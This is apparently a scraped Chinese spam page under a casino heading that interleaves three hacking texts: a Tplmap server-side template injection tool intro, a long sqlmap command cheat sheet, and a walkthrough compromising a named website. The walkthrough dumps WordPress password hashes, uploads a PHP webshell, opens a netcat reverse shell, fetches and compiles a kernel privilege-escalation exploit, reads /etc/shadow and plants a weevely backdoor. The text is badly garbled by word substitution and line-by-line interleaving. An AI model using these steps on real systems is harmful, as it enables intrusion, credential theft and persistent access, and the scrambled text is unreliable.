威尼斯人开户

环视服务器端模板注入漏洞的开源工具,注入神器sqlmap

21 4月 , 2019  

原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

一、查询数据

1旦黑客要侵袭的你的网址域名字为:hack-test.com

Tplmap是3个python工具,能够经过行使沙箱转义才具找到代码注入和服务器端模板注入(SSTI)漏洞。该工具能够在不少模板引擎中使用SSTI来访问目标文件或操作系统。一些受支持的沙盘引擎包罗PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja贰和Tornado。该工具得以进行对那些模板引擎的盲注入,并具有执行长途命令的力量。

Sqlmap:

  • 相似注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=壹” –dbs   查看全数数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包进行机动post注入(也得以进来http底部的自便地点注入,只要在注入地点投入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选择sqlmap默许选项)

  • -p  (参数选拔)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为寻常扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦点表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*环顾注入点*/

sqlmap.py -u “url” –dbs
/*列出富有数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出脚下用户*/

sqlmap.py -u “url” –tables -D
“当前数量库名” /*拆除当前多少库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数码库名” /*拆除钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环视注入点*/

sqlmap.py -u “url” –dbs
/*列出具备数据库*/

sqlmap.py -u “url” –current-db
/*列出脚下数据库*/

sqlmap.py -u “url” –current-user
/*列出近期用户*/

sqlmap.py -u “url” –tables -D
“当前数据库名” /*拆除与搬迁当前数码库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数量库名” /*拆除与搬迁钦赐表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSE福特ExplorerVEPRADO操作和MYSQL是一样的!!!常见的二种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp大概www.xxx.com/php” –cookie “参数名如id=一” –level
2/*level为进级权限*/

什么数据库就依据上面的数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的公文然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文本名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

捌.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

至于tamper脚本详细表明在本博客中有,链接为:

九.将注入语句插入到钦命地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

有个别网址是运用伪静态的页面使用SQLMAP的家常注入是老大的,所以SQLMAP提供了”*”参数将SQL语句插入钦定地方,一般用于伪静态注入。

在运用HTTP注入时行使-r参数也得以从来在文书中加多*号

拾.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.运用谷歌(谷歌(Google))语法搜索注入(Googlehack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻觅语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 展现程序的版本号并退出

-h, –help 呈现此支持消息并脱离

-v VEGL450JBL 详细等第:0-陆(默感觉一)

Target(目标):

以下至少需求安装个中贰个选项,设置目的UQashqaiL。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日志中分析目的。

-r REQUESTFILE
从三个文本中载入HTTP请求。

-g GOOGLEDOGL450K 管理Googledork的结果作为靶子U奥迪Q伍L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

这一个选拔能够用来内定如何连接到目的U福睿斯L。

–data=DATA 通过POST发送的数据字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U帕杰罗L
编码生成的cookie注入

环视服务器端模板注入漏洞的开源工具,注入神器sqlmap。–drop-set-cookie 忽略响应的Set –
Cookie头消息

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADE汉兰达S
换行分开,插足别的的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACERT
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到目标UCR-VL

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统暗许的HTTP代理

–delay=DELAY
在各样HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的时光(暗中同意为30秒)

–retries=RETCR-VIES
连接超时后再次连接的年月(私下认可叁)

–scope=SCOPE
从所提供的代理日志中过滤器目的的正则表明式

–safe-url=SAFU中华VL
在测试进度中时常访问的url地址

–safe-freq=SAFREQ
四遍访问之间测试请求,给出安全的USportageL

Optimization(优化):

这一个采纳可用于优化SqlMap的习性。

-o 开启全数优化开关

–predict-output 预测常见的询问输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从不曾实际的HTTP响应体中寻找页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(默以为一)

Injection(注入):

那些接纳能够用来内定测试哪些参数,
提供自定义的注入payloads和可选篡改脚本。

-p TESTPARAMETEGL450 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为那个值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPEHaval使用给定的剧本(S)篡改注入数据

Detection(检测):

这个采纳能够用来内定在SQL盲注时咋样剖析和相比较HTTP响应页面包车型客车剧情。

–level=LEVEL
实施测试的级差(1-5,默以为1)

–risk=LX570ISK
施行测试的高危害(0-3,默以为一)

–string=ST瑞虎ING
查询时有效时在页面相配字符串

–regexp=REGEXP
查询时有效时在页面相称正则表达式

–text-only 仅依照在文件内容相比较网页

Techniques(技巧):

这几个接纳可用来调节具体的SQL注入测试。

–technique=TECH
SQL注入手艺测试(默许BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(暗中同意为伍秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHAKuga用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
实行检查遍布的DBMS版本指纹

Enumeration(枚举):

这几个接纳能够用来列举后端数据库管理系列的消息、表中的布局和数量。其它,您仍是能够运营您本人

的SQL语句。

-b, –banner
检索数据库管理系列的标志

–current-user
检索数据库管理种类当下用户

–current-db
检索数据库管理种类当下数据库

–is-dba 检查实验DBMS当前用户是不是DBA

–users 枚举数据库管理种类用户

–passwords
枚举数据库管理种类用户密码哈希

–privileges
枚举数据库管理类别用户的权限

–roles 枚举数据库管理种类用户的剧中人物

–dbs 枚举数据库管理系列数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理种类的数据库中的表项

–dump-all
转储全体的DBMS数据库表中的条文

–search
寻觅列(S),表(S)和/或数据库名称(S)

-D DB 要进行枚举的数据库名

-T TBL 要拓展枚举的数目库表

-C COL 要开始展览枚举的数额库列

-U USEHighlander 用来举行枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTART
第三个查询输出进入检索

–stop=LIMITSTOP
最后查询的输出进入检索

–first=FI途胜STCHA瑞鹰第3个查询输出字的字符检索

–last=LASTCHA路虎极光最终查询的输出字字符检索

–sql-query=QUEMuranoY 要实行的SQL语句

–sql-shell 提醒交互式SQL的shell

Brute force(蛮力):

那几个选拔能够被用来运营蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

那一个选拔可以用来创造用户自定义函数。

–udf-inject 注入用户自定义函数

威尼斯人开户 ,–shared-lib=SHLIB 共享库的地点路线

File system
access(访问文件系统):

那一个采用能够被用来访问后端数据库管理系列的最底层文件系统。

–file-read=景逸SUVFILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的本土文件

–file-dest=DFILE
后端的数据库处理类别写入文件的相对路线

Operating system
access(操作系统访问):

那个选用能够用来访问后端数据库管理体系的平底操作系统。

 

–os-cmd=OSCMD 试行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取2个OOB
shell,meterpreter或VNC

–os-smbrelay ①键获取2个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进度缓冲区溢出利用

–priv-esc 数据库进度用户权限升高

–msf-path=MSFPATH Metasploit Framework本地的安装路线

–tmp-path=TMPPATH
远程一时文件目录的相对路线

Windows注册表访问:

这几个选择能够被用于访问后端数据库管理种类Windows注册表。

–reg-read 读3个Windows注册表项值

–reg-add
写2个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows挂号表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

那个采用能够用来安装有个别相似的劳作参数。

-t TRAFFICFILE
记录全部HTTP流量到三个文书文件中

-s SESSIONFILE
保存和还原检索会话文件的装有数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽略在对话文件中蕴藏的询问结果

–eta 呈现各种输出的揣度达到时间

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用全数暗中认可配置。

Miscellaneous(杂项):

–beep 开采SQL注入时提示

–check-payload
IDS对流入payloads的检查实验测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目的U福睿斯L的解析和测试格局

–gpage=GOOGLEPAGE
从钦赐的页码使用谷歌(谷歌)dork结果

–page-rank 谷歌dork结果突显网页排名(PSportage)

–parse-errors
从响应页面解析数据库管理类别的一无所长新闻

–replicate
复制转储的数目到一个sqlite叁数据库

–tor 使用暗中同意的Tor(比达尔ia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的简短向导分界面

./sqlmap.py -u “ sqlmap
提示 do you want to include all tests for ‘Microsoft SQL Server’
extending provided level (1) and risk (1)? [Y/n]  选 y

让我们用ping命令获取网址服务器的IP地址.

安装Tplmap

唤醒参数 id 有漏洞,是否要保持别的测试,按 y 回车鲜明 GET parameter ‘id’
is vulnerable. Do you want to keep testing the others (if any)? [y/N]

 

威尼斯人开户 1

获得具备数据库名 因为早已清楚数据库名字为微软的 sql
server,为了加快检查评定速度,内定数据库参数 –dbms=mssql ./sqlmap.py -u
“” –dbms=mssql –dbs

最近大家得到了网址服务器的IP地址为:17三.23陆.13八.1一3

能够经过行使以下github链接从github存款和储蓄Cook隆该工具来安装Tplmap。

现阶段网页连接数据库名 ./sqlmap.py -u
“” –dbms=mssql
–current-db

查找同样服务器上的别的网址,大家采纳sameip.org.

git clone

钦点数据库全数表 ./sqlmap.py -u
“” –dbms=mssql –table
-D “testdb”

 

水到渠成安装后,将引得路径改造为tplmap安装文件以运维tplmap.py。

读取内定表中的字段名 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –columns

26 sites hosted on IP Address 173.236.138.113

测试Web应用程序中的漏洞

读取钦点字段内容 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –dump -C “username,password”

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

Tplmap不仅选取了文件系统的尾巴,而且还有所应用分歧参数访问底层操作系统的力量。以下荧屏截图呈现了可用来访问操作系统的不一样参数选项

贰、实施系统命令

173.23陆.13八.1一3上有二伍个网址,许多黑客为了夺回你的网站恐怕会检讨同服务器上的别的网站,不过本次是以切磋为目的,我们将抛开服务器上的别的网址,只针对你的网址来实行侵犯检查测试。

威尼斯人开户 2

./sqlmap.py -u “”
–dbms=mssql –os-shell –threads=10

We’ll need more information about your site, such as:

以下命令可用于测试目的UCR-VL中的易受攻击的参数。

三、常见参数

小编们供给有关您网站的以下音讯:

./tplmap.py -u <‘目的网站’>

流入点 HTTP 钦点请求方法检查实验 POST
–data=”password=88952634&rem=on&username=8895263肆”

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

实施该命令后,该工具会指向多少个插件测试目标ULX570L以搜寻代码注入机会。

Cookie –cookie “cookie value” 登入检查测试

让大家初步找你网站的DNS记录,我们用who.is来落成这一目标.

威尼斯人开户 3

流入查询数据本领 –technique=U  钦命 Union 技艺

 

若果开采漏洞,该工具将出口有关目的中或然注入点的详细音讯。那个包蕴GET参数值(无论是id依旧名称),模板引擎(举个例子Tornado),OS(例如Linux)和注入本事(比如渲染,盲)。

流入 HTTP 全数办法注入检查评定 –level三  检查实验 HTTP
方法深度,GET、POST、Cookie、User-agent 和 Referer

我们开采你的DNS记录如下

威尼斯人开户 4

Base64 编码 url 注入点 sqlmap -u
–tamper
base64encode.py

 

对于易受攻击的对象操作系统,能够行使后面提到的中间一个参数重国民党的新生活运动行tplmap命令。比方,大家可以透过以下情势将-os
-shell选项与tplmap命令一齐利用。

检查实验 DBMS 当前用户是或不是 DBA(注入点推行操作系统命令一般供给 DBA 权限)
–is-dba

让我们来规定web服务器的门类

./tplmap.py –os-shell -u <‘目的网站’>

未有询问用户输入,使用具备暗中同意配置 –batch

 

-os -shell选项在对象操作系统上运营伪终端以举办所需的代码。

暗中同意最大线程数为 十 –threads=10

意识你的W eb服务器是apache,接下去明确它的版本.

文章出处:latesthackingnews回来今日头条,查看越多

  1. #HiRoot’s Blog  

HACK-TEST.COM SITE INFORMATION

责编:

 2. Options(选项):  

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

 三. –version 展现程序的版本号并退出 

接下去是时候搜索你网址域名的注册消息,你的对讲机、邮箱、地址等.

 肆. -h, –help 展现此协理新闻并脱离

 

  五. -v VELacrosse金河田 详细品级:0-六(默以为 一)

大家未来一度获得了您的网址域名的登记音信,包蕴你的机要音讯等.大家能够透过backtrack 5中的whatweb来获取你的网址服务器操作系统类型和服务器的版本.

6.    7. Target(目标): 

 

 捌. 以下至少供给设置当中3个选项,设置目的 U猎豹CS6L。

 

9.   

咱俩开掘你的网址接纳了名牌的php整站程序wordpress,服务器的的系统项目为Fedora Linux,Web服务器版本Apache 二.2.①伍.承接翻看网址服务器开放的端口,用渗透测试工具nmap:

 10. -d DIRECT 直接连接到数据库。 

1-Find services that run on server(查看服务器上运营的劳动)

 11. -u URL, –url=URL 目标 URL。 

2-Find server OS(查看操作系统版本)

 1贰. -l LIST 从 Burp 或 WebScarab 代理的日志中分析目的。

只有80端口是开放的,操作系统是Linux二.陆.2二(Fedora Core 陆),今后大家曾经征集了独具关于你网址的要紧新闻, 接下来开端扫描寻觅漏洞,举个例子:

  壹三. -r REQUESTFILE 从3个文件中载入 HTTP 请求。 

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF 等等.

 14. -g GOOGLEDO本田UR-VK 管理 谷歌(Google) dork 的结果作为目的 U昂科雷L。

大家将选择Nikto来搜罗漏洞音信:

  一5. -c CONFIGFILE 从 INI 配置文件中加载选项。

root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com

16.    

我们也会用到Backtrack 伍 君越第11中学的W叁AF 工具:

  1. Request(请求)

  2. 那个选择能够用来钦定如何连接到目标 U安德拉L。

root@bt:/pentest/web/w3af# ./w3af_gui

19.   

 

 20. –data=DATA 通过 POST 发送的数额字符串  

我们输入要检查实验的网站地址,选用完整的安全审计选项.

  1. –cookie=COOKIE HTTP Cookie 头 

 

 2二. –cookie-urlencode ULANDL 编码生成的 cookie 注入 

稍等①会,你将会看到扫描结果.

 二3. –drop-set-cookie 忽略响应的 Set – 库克ie 头消息 

 

 24. –user-agent=AGENT 指定 HTTP User – Agent 头 

察觉你的网址存在sql注入漏洞、XSS漏洞、以及别的的漏洞.让我们来探究SQL注入漏洞.

 二伍. –random-agent 使用随机选定的 HTTP User – Agent 头

%27z%220

  26. –referer=REFERER 指定 HTTP Referer 头  

咱俩因而工具开掘这些U景逸SUVL存在SQL注入,我们通过Sqlmap来检查实验那一个url.

  1. –headers=HEADEOdysseyS 换行分开,参预别的的 HTTP 头

Using sqlmap with –u url

  2八. –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)

 

(Basic, Digest or NTLM) 

过一会你会看出

 29. –auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)

 

  30. –auth-cert=ACERT HTTP 认证证书(key_file,cert_file)

输入N按回车键继续

  3一. –proxy=PROXY 使用 HTTP 代理连接到目的 URL

 

  1. –proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码) 

我们开采你的网站存在mysql显错注入,mysql数据库版本是5.0. 大家通过投入参数”-dbs”来品尝收集数据库名.

 33. –ignore-proxy 忽略系统暗许的 HTTP 代理 

 

 3四. –delay=DELAY 在各样 HTTP 请求之间的延迟时间,单位为秒 

 

 3伍. –timeout=TIMEOUT 等待连接超时的时日(默感到 30 秒) 

意识多个数据库,接下去通过参数”-D wordpress -tables”来查阅wordpress数据库的有着表名

 3陆. –retries=RETLX570IES 连接超时后再次连接的岁月(默许 三)

 

  三七. –scope=SCOPE 从所提供的代理日志中过滤器目的的正则表明式 

 

 3捌. –safe-url=SAFU福睿斯L 在测试进度中日常访问的 url 地址  

通过参数“-T wp_users –columns
”来查看wp_users表中的字段.

  1. –safe-freq=SAFREQ 四遍访问之间测试请求,给出安全的 UOdysseyL

 

40.    41. Optimization(优化):

 

  42. 那一个选择可用于优化 SqlMap 的习性。

接下去猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass –dump”

43.   

 

 4四. -o 开启全部优化按钮  

大家会发掘用户名和密码hashes值.
大家必要通过以下在线破解网站来破解密码hashes

 肆五. –predict-output 预测常见的询问输出

  四六. –keep-alive 使用持久的 HTTP(S)连接 

 

 四7. –null-connection 从未有实际的 HTTP 响应体中查找页面长度 

登陆wordpress的后台wp-admin

 4捌. –threads=THREADS 最大的 HTTP(S)请求并发量(默感到 一)

品味上传php webshell到服务器,以方便运维一些linux命令.在插件页面搜索其余能够编写制定的插件. 大家采取Textile那款插件,编辑插入大家的php webshell,点击更新文件,然后访问大家的php webshell.

49.    50. Injection(注入):  

 

 5一. 那么些选择能够用来钦定测试哪些参数, 提供自定义的流入 payloads
和可选篡改脚 本。

Php webshell被解析了,大家可以垄断(monopoly)你网址的文本,可是大家只愿意获得网址服务器的root权限,来侵略服务器上别的的网址。

52.   

咱俩用NC来反弹二个shell,首先在我们的微型Computer上监听555伍端口.

 伍三. -p TESTPARAMETE安德拉 可测试的参数(S)  

 

  1. –dbms=DBMS 强制后端的 DBMS 为此值 

下一场在Php webshell上反向连接大家的电脑,输入你的IP和端口555伍.

 55. –os=OS 强制后端的 DBMS 操作系统为这几个值

点击连接大家见面到

  1. –prefix=PREFIX 注入 payload 字符串前缀 

接下去我们尝试推行一些限令:

 57. –suffix=SUFFIX 注入 payload 字符串后缀  

id

  1. –tamper=TAMPE宝马7系 使用给定的脚本(S)篡改注入数据

uid=48(apache) gid=489(apache) groups=489(apache)
(用来突显用户的id和组)

59.    60. Detection(检测): 

pwd

 61. 那个选取能够用来钦点在 SQL 盲注时怎么样分析和相比 HTTP
响应页面包车型客车情节。

/var/www/html/Hackademic_RTB1/wp-content/plugins
(突显服务器上脚下的不二秘籍)

62.   

uname -a

 6三. –level=LEVEL 试行测试的品级(一-伍,默以为 一)

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45
EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本消息)

  6四. –risk=凯雷德ISK 施行测试的危害(0-3,默感到 一)

 

 65. –string=ST奥迪Q7ING 查询时有效时在页面匹配字符串

现行反革命我们通晓,服务器的基石版本是贰.陆.3壹.五-127.fc12.16八陆,大家在exploit-db.com中查找此版本的连带漏洞.
在服务器上测试了繁多exp之后,我们用以下的exp来进步权限.

  1. –regexp=REGEXP 查询时有效时在页面相称正则表明式 

笔者们在nc shell上施行以下命令:
wget -o roro.c
(下载exp到服务器一视同仁命名叫roro.c)
注:繁多linux内核的exp都以C语言开采的,因而大家保留为.c扩张名.
exp roro.c代码如下:

 67. –text-only 仅遵照在文件内容相比较网页

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
因此上述代码大家发现该exp是C语言开拓的,大家需求将她编译成elf格式的,命令如下:

68.    69. Techniques(技巧):  

gcc roro.c –o roro

 70. 那些选取可用来调度具体的 SQL 注入测试。

接下去试行编写翻译好的exp

7一.    72. –technique=TECH SQL 注入本领测试(暗许 BEUST) 

./roro

 7三. –time-sec=TIMESEC DBMS 响应的延迟时间(默以为 5 秒) 

执行到位之后大家输入id命令

 7四. –union-cols=UCOLS 定列范围用于测试 UNION 查询注入  

id

  1. –union-char=UCHA本田CR-V 用于暴力猜解列数的字符

大家发现大家曾经是root权限了

76.    77. Fingerprint(指纹): 

uid=0(root) gid=0(root)

 78. -f, –fingerprint 推行检查遍布的 DBMS 版本指纹

当今大家得以查看/etc/shadow文件
cat /etc/shadow

79.    80. Enumeration(枚举):

查看/etc/passwd 文件

  8一.
这几个采用可以用来列举后端数据库管理系列的音信、表中的组织和数量。此外,您
还是可以运作您自个儿

cat /etc/passwd

  1. 的 SQL 语句。 

笔者们得以采纳”john the
ripper”工具破解全体用户的密码.可是大家不会这么做,大家要求在这么些服务器上预留后门以有益大家在别的时候访问它.

 8三. -b, –banner 检索数据库处理类别的标志 

俺们用weevely制作八个php小即刻传到服务器上.

 八肆. –current-user 检索数据库管理种类当下用户 

一.weevely行使选用
root@bt:/pentest/backdoors/web/weevely# ./main.py –

 85. –current-db 检索数据库管理种类当下多少库 

 

 八六. –is-dba 检查测试 DBMS 当前用户是不是 DBA 

贰.用weevely创立二个密码为koko的php后门

 八七. –users 枚举数据库管理连串用户

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p
koko

  8八. –passwords 枚举数据库处理种类用户密码哈希 

 

 89. –privileges 枚举数据库管理种类用户的权力 

接下去上传出服务器之后来利用它
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u
-p
koko

 90. –roles 枚举数据库管理种类用户的剧中人物 

测试大家的hax.php后门

 九一. –dbs 枚举数据库管理种类数据库  

 

 九贰. –tables 枚举的 DBMS 数据库中的表 

总结:

 玖三. –columns 枚举 DBMS 数据库表列 

在那边小说中大家学到的局地本领正被黑客用来凌犯你的网址和服务器,大家希望能通过这篇小说能够对您今后保卫安全服务器和网址安全负有帮助.

 九肆. –dump 转储数据库管理种类的数据库中的表项  

正文只是用来学习驾驭Web安全的连带知识,原来的书文链接:

  1. –dump-all 转储全部的 DBMS 数据库表中的条目 

 九陆. –search 寻找列(S),表(S)和/或数据库名称(S)

 

  九七. -D DB 要拓展枚举的数据库名  

 玖捌. -T TBL 要开始展览枚举的数据库表  

 9九. -C COL 要实行枚举的数据库列

  1. -U USE奥德赛 用来展开枚举的数据库用户  

  2. –exclude-sysdbs 枚举表时排除系统数据库  

  3. –start=LIMITSTART 先是个查询输出进入检索  

  4. –stop=LIMITSTOP 最后查询的输出进入检索  

  5. –first=FI奥德赛STCHA翼虎 首先个查询输出字的字符检索  

  6. –last=LASTCHAOdyssey 最终查询的出口字字符检索  

 拾陆. –sql-query=QUE君越Y 要施行的 SQL 语句 

 10柒. –sql-shell 提醒交互式 SQL 的 shell

108.    109. Brute force(蛮力):  

 110. 那个选择可以被用来运行蛮力检查。

11壹.    11二. –common-tables 检查存在共同表  

 1壹3. –common-columns 检查存在共同列

11四.    1一5. User-defined function injection(用户自定义函数注入):

  1. 这么些选择能够用来创立用户自定义函数。

117.    11八. –udf-inject 注入用户自定义函数  

 11玖. –shared-lib=SHLIB 共享库的地点路线

120.    12一. File system access(访问文件系统): 

 12贰. 那个采纳可以被用于访问后端数据库管理体系的最底层文件系统。

12三.    124. –file-read=昂科拉FILE 从后端的数据库管理系统文件系统读取文件 

  1. –file-write=WFILE 编辑后端的数据库管理系统文件系统上的当麻芋果件 
  2. –file-dest=DFILE 后端的数据库管理种类写入文件的相对路线

1二7.    12八. Operating system access(操作系统访问): 

 12九. 那些选用能够用于访问后端数据库管理类别的底层操作系统。

130.    131. –os-cmd=OSCMD 实施操作系统命令  

 13二. –os-shell 交互式的操作系统的 shell  

 13三. –os-pwn 获取1个 OOB shell,meterpreter 或 VNC  

  1. –os-smbrelay 一键获得三个 OOB shell,meterpreter 或 VNC

  2. –os-bof 存款和储蓄进程缓冲区溢出利用  

 136. –priv-esc 数据库进度用户权限升高  

 一三柒. –msf-path=MSFPATH Metasploit Framework 本地的装置路线  

  1. –tmp-path=TMPPATH 远程一时半刻文件目录的相对路线

13玖.    140. Windows 注册表访问: 

 1四壹. 这几个选拔能够被用于访问后端数据库管理体系 Windows 注册表。

142.    14三. –reg-read 读3个 Windows 注册表项值 

  1. –reg-add 写1个 Windows 注册表项值数据  

  2. –reg-del 删除 Windows 注册表键值 

 146. –reg-key=REGKEY Windows 注册表键  

  1. –reg-value=REGVAL Windows 注册表项值  

  2. –reg-data=REGDATA Windows 挂号表键值多少  

 14九. –reg-type=REGTYPE Windows 注册表项值类型

150.    151. General(一般):

15二.    一5三. 这一个采纳能够用来安装有个别貌似的干活参数。 

  1. -t TRAFFICFILE 记录全部 HTTP 流量到三个文本文件中 

 15伍. -s SESSIONFILE 保存和还原检索会话文件的富有数据  

  1. –flush-session 刷新当前线指挥部标的对话文件 

 15柒. –fresh-queries 忽略在对话文件中存款和储蓄的询问结果  

  1. –eta 展现每一个输出的测度达到时间  

 159. –update 更新 SqlMap  160. –save file 保存选项到 INI 配置文件 

 1六一. –batch 从不询问用户输入,使用全部暗许配置。

162.    163. Miscellaneous(杂项): 

 16肆. –beep 开掘 SQL 注入时提示

  165. –check-payload IDS 对流入 payloads 的检验测试  

 166. –cleanup SqlMap 具体的 UDF 和表清理 DBMS  

  1. –forms 对目的 UCRUISERL 的剖析和测试方式 

 16八. –gpage=GOOGLEPAGE 从钦定的页码使用谷歌 dork 结果  

